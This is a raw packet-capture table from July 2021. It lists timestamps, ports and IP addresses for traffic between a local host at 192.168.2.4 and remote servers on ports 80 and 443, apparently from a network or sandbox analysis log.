Jul 6, 2021 14:31:02.296096087 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.296106100 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296128035 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296144009 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.296144962 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296166897 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296181917 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.296185017 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296201944 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296231031 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.296262026 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.296325922 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296351910 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296370983 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296370029 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.296394110 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296413898 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296428919 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.296431065 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296447992 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296464920 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296471119 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.296482086 CEST	80	49878	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:02.296510935 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:02.296535969 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:03.867511988 CEST	49878	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:03.867609024 CEST	49879	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:04.350615978 CEST	49870	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:04.350989103 CEST	49871	443	192.168.2.4	82.165.229.87
Jul 6, 2021 14:31:04.351180077 CEST	49872	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:04.351236105 CEST	49873	443	192.168.2.4	82.165.229.59
Jul 6, 2021 14:31:04.351336002 CEST	49875	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:04.351480007 CEST	49874	443	192.168.2.4	82.165.229.54
Jul 6, 2021 14:31:04.351511002 CEST	49876	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:04.351567984 CEST	49877	443	192.168.2.4	82.165.229.16
Jul 6, 2021 14:31:07.400335073 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.401559114 CEST	49881	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.410769939 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.410953045 CEST	49883	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.438271999 CEST	80	49881	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.438302040 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.438436031 CEST	49881	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.438517094 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.448776960 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.448807001 CEST	80	49883	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.448883057 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.448956966 CEST	49883	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.476458073 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.509743929 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.513386965 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.536185026 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.536336899 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.536367893 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.536400080 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.536423922 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.536434889 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.536451101 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.536472082 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.536482096 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.536493063 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.536511898 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.536534071 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.536537886 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.536556959 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.536577940 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.536623001 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.546436071 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573613882 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573651075 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573673010 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573698997 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573724031 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573745966 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573769093 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573776007 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.573791981 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573796034 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.573798895 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.573801994 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.573813915 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573834896 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573857069 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573884010 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573909998 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573931932 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573951006 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573971987 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.573992014 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.574012041 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.574032068 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.574055910 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.574681997 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.574712038 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.574717045 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.574719906 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.574723005 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.574726105 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.574728012 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.574731112 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.574734926 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.574738026 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.611398935 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611443043 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611462116 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611480951 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611499071 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611522913 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611545086 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611567974 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611593962 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611618042 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611639977 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611663103 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611685038 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611702919 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611721039 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611740112 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611762047 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611784935 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611808062 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611830950 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611851931 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611876011 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611898899 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611924887 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611949921 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611972094 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.611994028 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612015963 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612039089 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612062931 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612085104 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612111092 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612133980 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612169981 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612190962 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612210989 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612231016 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612248898 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612268925 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612293005 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.612473965 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612503052 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612505913 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612509012 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612512112 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612514019 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612517118 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612519979 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612521887 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612524986 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612526894 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612529993 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612531900 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612535000 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612538099 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.612540960 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.649954081 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.649988890 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650012016 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650036097 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650065899 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650088072 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650108099 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650146008 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650151014 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.650168896 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650191069 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650216103 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.650229931 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650249958 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.650273085 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.650281906 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650305986 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650327921 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650356054 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.650362968 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650394917 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.650396109 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650419950 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650441885 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.650459051 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650480032 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.650511026 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.650511026 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650537014 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650558949 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650583982 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.650609016 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.650624037 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.650660992 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.651407957 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651451111 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651472092 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651493073 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651513100 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651535988 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651560068 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651582956 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651606083 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651638031 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651644945 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651658058 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651674032 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651700020 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651721954 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651741982 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651765108 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651782990 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651803017 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651823997 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651844978 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651868105 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651890039 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651910067 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651930094 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651951075 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651968002 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.651971102 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.651993036 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652013063 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652034998 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652060986 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652082920 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652102947 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652124882 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652143955 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652164936 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652184963 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652206898 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652226925 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652247906 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652251005 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.652268887 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652288914 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652307987 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652328968 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652349949 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652373075 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652395010 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652414083 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652434111 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652453899 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.652456045 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652477980 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652497053 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652517080 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652539968 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652554989 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.652564049 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652582884 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652601957 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652623892 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.652642012 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.652708054 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.671403885 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.671462059 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.671487093 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.671503067 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.671525955 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.671533108 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.671550989 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.671582937 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.671606064 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.671607018 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.671629906 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.671654940 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.671679020 CEST	80	49882	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.671680927 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.671705008 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.671762943 CEST	49882	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689397097 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689430952 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689452887 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689481020 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689481020 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689503908 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689513922 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689528942 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689552069 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689558983 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689574003 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689587116 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689601898 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689616919 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689620972 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689635038 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689661980 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689661980 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689687014 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689707041 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689709902 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689734936 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689735889 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689757109 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689776897 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689779997 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689804077 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689811945 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689826965 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689851046 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689851999 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689876080 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689893007 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689898968 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689918041 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689922094 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689945936 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689954042 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689970970 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.689980984 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.689994097 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690016985 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690023899 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690052032 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690076113 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690078020 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690100908 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690114975 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690129042 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690145016 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690154076 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690176010 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690181017 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690200090 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690212011 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690224886 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690248013 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690248966 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690272093 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690293074 CEST	49880	80	192.168.2.4	45.90.58.179
Jul 6, 2021 14:31:07.690295935 CEST	80	49880	45.90.58.179	192.168.2.4
Jul 6, 2021 14:31:07.690323114 CEST	80	49880	45.90.58.179	192.168.2.4
